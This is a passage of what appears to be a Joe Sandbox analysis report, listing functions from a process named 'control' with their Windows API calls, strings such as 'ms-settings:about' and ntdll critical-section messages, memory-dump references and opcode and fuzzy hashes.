                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0087388F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CommandHandleInfoLineModuleStartupTrimmemset
                                  • String ID:
                                  • API String ID: 1556929265-0
                                  • Opcode ID: d033a6d8cd21c851605abe6065f4ba51a0fbebb7e695dddc5d10885a178c848f
                                  • Instruction ID: 62798a4701fff4c67471fffde55ebb6bfa765e4ac27bf4cbfd6de5f7510f23b7
                                  • Opcode Fuzzy Hash: d033a6d8cd21c851605abe6065f4ba51a0fbebb7e695dddc5d10885a178c848f
                                  • Instruction Fuzzy Hash: 4C01D232D0021893DB34A7908C49BAE7678FF85701F158029FD4DE3188E774DE86E2A3
                                  Function 04D6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04DB02BD
                                  • RTL: Re-Waiting, xrefs: 04DB031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04DB02E7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 517f007585e63e9e7394a99f79e7a0521f1b0087ea174063bdd40048181cfd6b
                                  • Instruction ID: c86c71f0f563848cf0c668e2def3e94ec6bd88638d48274ec4e4168d073348b6
                                  • Opcode Fuzzy Hash: 517f007585e63e9e7394a99f79e7a0521f1b0087ea174063bdd40048181cfd6b
                                  • Instruction Fuzzy Hash: EEE1AC70608B41DFD725CF28D884B6AB7E0FB89314F144A5DE4A68B2E0E774F945CB92
                                  Function 04D7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 04DB7BAC
                                  • RTL: Resource at %p, xrefs: 04DB7B8E
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04DB7B7F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 64f95a8f13d680034d433db61c065cc6d25e55aee37e4dfad63849ab8b256fea
                                  • Instruction ID: ee9b25b1556e6f591cee00a724b171dba1104f53415aef992a3e111d8dc90ccf
                                  • Opcode Fuzzy Hash: 64f95a8f13d680034d433db61c065cc6d25e55aee37e4dfad63849ab8b256fea
                                  • Instruction Fuzzy Hash: BD41B0317057029FD724DE25C840B6AB7E5FF89B18F100A1EF896DB680EB31F5058B91
                                  Function 04D7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DB728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04DB7294
                                  • RTL: Re-Waiting, xrefs: 04DB72C1
                                  • RTL: Resource at %p, xrefs: 04DB72A3
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 52962a2fa4bcd49f28a28bf0264c26b123b85baafd111087ef7b2fc5cdb670d1
                                  • Instruction ID: 7283562af7631a3924425b8ab8b3d09fda743ebb313ab7c1ef06fdc8707d2bae
                                  • Opcode Fuzzy Hash: 52962a2fa4bcd49f28a28bf0264c26b123b85baafd111087ef7b2fc5cdb670d1
                                  • Instruction Fuzzy Hash: 8641D031740206AFD721DE25CC41BA6B7A5FF84718F14061DF996EB280EB31F8469BE1
                                  Function 04DF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 7f964c87a5ad4eef1640ca296d55f97fb0f28ef33491325fb1f682efe20666b4
                                  • Instruction ID: 2d4c4ffc6a60417d708f2f9c96ed5bc6b2fe09941592af7438d749bb055ada41
                                  • Opcode Fuzzy Hash: 7f964c87a5ad4eef1640ca296d55f97fb0f28ef33491325fb1f682efe20666b4
                                  • Instruction Fuzzy Hash: B1314372A006199FDB60DF29DC40BEE77E8FB44714F454599E949E3240EB31FA488BA1
                                  Function 0087A958 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002,::{7007ACC7-3202-11D1-AAD2-00805FC1270E},-00000002,?,?,00873C95,00000014,?,?), ref: 0087A968
                                  • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00871428,00000000,00000001,00871900,?,?,?,00873C95,00000014,?,?), ref: 0087A985
                                  • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,00873C95,00000014,?,?), ref: 0087A9DB
                                  Strings
                                  • ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}, xrefs: 0087A95F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CreateInitializeInstanceUninitialize
                                  • String ID: ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
                                  • API String ID: 948891078-2378036714
                                  • Opcode ID: 9f0f1295486336eb18df13fa6ec05f0acfc2f59bff1bf03537ca680e961e6495
                                  • Instruction ID: 7ca816cf0f02e23d8bd9dcc306f3077c4c8c047d5f373a389926cce05ffa62f3
                                  • Opcode Fuzzy Hash: 9f0f1295486336eb18df13fa6ec05f0acfc2f59bff1bf03537ca680e961e6495
                                  • Instruction Fuzzy Hash: 6111CE7A700614AFD7009B58DC49F1EBBB9EFC8720F254065FA09E7390DA71EC019BA0
                                  Function 00876BD3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00876C1D
                                  • ShellExecuteExW.SHELL32(00000001), ref: 00876C53
                                    • Part of subcall function 00878463: GetLastError.KERNEL32(00876C62), ref: 00878463
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ErrorExecuteLastShellmemset
                                  • String ID: ms-settings:about$open
                                  • API String ID: 486181658-1618534989
                                  • Opcode ID: cb0f3fbaa9fd32ed004a7ac60614d84ecc8e8d583ce2fb329d74f982a68e18e4
                                  • Instruction ID: 04e0c7aac84c57deb802203241b34caf70e7aa427927e3dd2ab4f5d259303ca6
                                  • Opcode Fuzzy Hash: cb0f3fbaa9fd32ed004a7ac60614d84ecc8e8d583ce2fb329d74f982a68e18e4
                                  • Instruction Fuzzy Hash: F0015A71518301ABC700EF58C849B9F7BE8FB843A8F00891CF48CD2295DB74D6488B97
                                  Function 00879090 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(kernelbase.dll), ref: 0087909B
                                  • GetProcAddress.KERNEL32(00000000,RaiseFailFastException), ref: 008790A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: RaiseFailFastException$kernelbase.dll
                                  • API String ID: 1646373207-919018592
                                  • Opcode ID: 7cb941b62f077423dd2da93eb937e50443a0d7972ee27a50a9db87dfe07e5813
                                  • Instruction ID: 5cce24bd34439b78daca3a6845f78e8043bab2de8f3de7e124113e014a375cac
                                  • Opcode Fuzzy Hash: 7cb941b62f077423dd2da93eb937e50443a0d7972ee27a50a9db87dfe07e5813
                                  • Instruction Fuzzy Hash: B7E0EC3A901729BB8B212F95AC0CC9A7F29FF85BA17048011F91D92228CA31C851DBE0
                                  Function 00879167 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: memcpy_s
                                  • String ID:
                                  • API String ID: 1502251526-0
                                  • Opcode ID: b86026babd361136a39d6b318136d51b40fb0ef700b0e3b673206443be32d419
                                  • Instruction ID: 156fe87ec57c3679a7d2b6ec7d7ead4d0c17def8f1b0bec7effab6e4102d351b
                                  • Opcode Fuzzy Hash: b86026babd361136a39d6b318136d51b40fb0ef700b0e3b673206443be32d419
                                  • Instruction Fuzzy Hash: 8821D174500218ABDB10DF58CC89AAABBB9FF05714F948085E958DB249E334EE91CBB4
                                  Function 0087AB91 Relevance: 6.1, APIs: 4, Instructions: 70registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00000104,00000000,?,?,?), ref: 0087ABD8
                                  • StrCmpICW.SHLWAPI(?,?), ref: 0087AC07
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,-000000FA), ref: 0087AC39
                                  • RegCloseKey.ADVAPI32(?), ref: 0087AC65
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CloseEnumEnvironmentExpandStringsValue
                                  • String ID:
                                  • API String ID: 171902810-0
                                  • Opcode ID: 99fca5e51bb598782e6cd693aafe3f379e221e77d4215e4cf89ebe3ad02ffa5a
                                  • Instruction ID: 7c0fdbf57ea9a70cf198dea6a6079eea34cf9343076f72299bae9c75a096c775
                                  • Opcode Fuzzy Hash: 99fca5e51bb598782e6cd693aafe3f379e221e77d4215e4cf89ebe3ad02ffa5a
                                  • Instruction Fuzzy Hash: 9F2139B1A00118AFCB29DF14CC89BAE737AFBD1311F104299E50EE6154DB329EA4CF52
                                  Function 00878D5F Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnterCriticalSection.KERNEL32 ref: 00878D70
                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 00878D79
                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 00878DA1
                                  • LeaveCriticalSection.KERNEL32 ref: 00878DAC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CriticalExclusiveLockSection$AcquireEnterLeaveRelease
                                  • String ID:
                                  • API String ID: 1115728412-0
                                  • Opcode ID: eb0dc29693d578c3069b6f0c738f02decad2abd570f168179a875ca98ad8db13
                                  • Instruction ID: beb2d187cf2e63a41e8f6b8df971715458adba46ffa21db283dcdbfd5952b3f4
                                  • Opcode Fuzzy Hash: eb0dc29693d578c3069b6f0c738f02decad2abd570f168179a875ca98ad8db13
                                  • Instruction Fuzzy Hash: 35F09072101A18EFCB305F55D88CB997FB8FF24366F108119E94DC6164CB71C896CB80
                                  Function 00873FB0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 008745D8: GetModuleHandleW.KERNEL32(00000000), ref: 008745DF
                                  • __set_app_type.MSVCRT ref: 00873FC2
                                  • __p__fmode.MSVCRT ref: 00873FD8
                                  • __p__commode.MSVCRT ref: 00873FE6
                                  • __setusermatherr.MSVCRT ref: 00874007
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                  • String ID:
                                  • API String ID: 1632413811-0
                                  • Opcode ID: a4e4ac388297e8cfa903553665a8f93e6e8e0b8d44bbde094a59b370a63518d5
                                  • Instruction ID: 79fc05a5f79ad206f3cea818df1e969dbc0a4a8d1055c37f57e4122c3b7f7f56
                                  • Opcode Fuzzy Hash: a4e4ac388297e8cfa903553665a8f93e6e8e0b8d44bbde094a59b370a63518d5
                                  • Instruction Fuzzy Hash: 3DF0D470444304DFD624AF34A84E2083BA1FB15322B50961CE12EC73F9CF75C080CB11
                                  Function 04D87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: d96feb5e495916607a78e374944091abc1297174e2b17225bec7c1ede1cef195
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 1F917271F0021A9ADB24FE6ACC81ABEB7A5FF44720F64451FE855E72D1E730E9409760
                                  Function 04D49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 748e0d6a69270a53ebe2117a3b588eb4024639d2122a340ad67bae0c0fbc1a34
                                  • Instruction ID: aaf0164c61b5717a3d71a59398bbf887d5fa506221d097e49f6ee0711fbbca30
                                  • Opcode Fuzzy Hash: 748e0d6a69270a53ebe2117a3b588eb4024639d2122a340ad67bae0c0fbc1a34
                                  • Instruction Fuzzy Hash: 3C812DB1D012699BDB31CB65CC54BEEB7B4BB48714F0441EAA919B7240E730AE84CFA0
                                  Function 00875252 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32(00000040), ref: 00875273
                                  • CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001), ref: 008752A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CreateCurrentMutexProcess
                                  • String ID: Local\SM0:%d:%d:%hs
                                  • API String ID: 3937467467-4162240545
                                  • Opcode ID: 67605fdadc4d782701d90696d5365e805efbbc30ec18541d6dbabcee2786e377
                                  • Instruction ID: d535ff6b8553f8bffb377d5a2783080fdf313ebf2a2652ae07136786f2d751e9
                                  • Opcode Fuzzy Hash: 67605fdadc4d782701d90696d5365e805efbbc30ec18541d6dbabcee2786e377
                                  • Instruction Fuzzy Hash: EE31A67194062D9BCB20EF68DC89AD97378FB14340F0081A9E40DD7259EBB0DE848F91
                                  Function 00875388 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32(000000A8), ref: 008753AC
                                  • CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001), ref: 008753E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CreateCurrentMutexProcess
                                  • String ID: Local\SM0:%d:%d:%hs
                                  • API String ID: 3937467467-4162240545
                                  • Opcode ID: a1bc9ce0a790a2385e4343f248104e270cdc1bf5046989cae15da72d84021eff
                                  • Instruction ID: 124a52714930f7827a27a17d85cc0ec45adaf4660bc79cfc567edeba3ca0348b
                                  • Opcode Fuzzy Hash: a1bc9ce0a790a2385e4343f248104e270cdc1bf5046989cae15da72d84021eff
                                  • Instruction Fuzzy Hash: 583186B194022D9BCB24EF68DC89AD97778FF54300F1085A9E40DE7249EBB0DE848F91
                                  Function 00878C42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSemaphoreW.KERNEL32(001F0003,00000000,?,_p0), ref: 00878C92
                                  • GetLastError.KERNEL32 ref: 00878CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ErrorLastOpenSemaphore
                                  • String ID: _p0
                                  • API String ID: 1909229842-2437413317
                                  • Opcode ID: 51e5ebf125b329ce94f85a0cb1b87f33da9010251d8e11a39dce265e9ab990f1
                                  • Instruction ID: a0b721e8f89e51641039bc8bdb2f9a623d8c7e769499742bec15f405e27c3954
                                  • Opcode Fuzzy Hash: 51e5ebf125b329ce94f85a0cb1b87f33da9010251d8e11a39dce265e9ab990f1
                                  • Instruction Fuzzy Hash: CB218171641228DBCB15EF28C98DAAA77B5FB94350F1081A9B80DD7249DE30DE41CBA2
                                  Function 008754E6 Relevance: 5.0, APIs: 4, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,00874FAD), ref: 00875504
                                  • HeapFree.KERNEL32(00000000,?,?,?,00874FAD), ref: 0087550B
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,00874FAD), ref: 00875529
                                  • HeapFree.KERNEL32(00000000), ref: 00875530
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: d9c4edd987dffdcacba437c5fd4a9b9b113791a2afdd5c799dc53dadecab83e1
                                  • Instruction ID: 364a04e83c44644dcb22d59661662eb84315f96960ff907028348693b4615fb0
                                  • Opcode Fuzzy Hash: d9c4edd987dffdcacba437c5fd4a9b9b113791a2afdd5c799dc53dadecab83e1
                                  • Instruction Fuzzy Hash: 44F03C72610601ABD7148FA1DC88B65B7F9FF48316F10092DE549C6450D774E995CBA1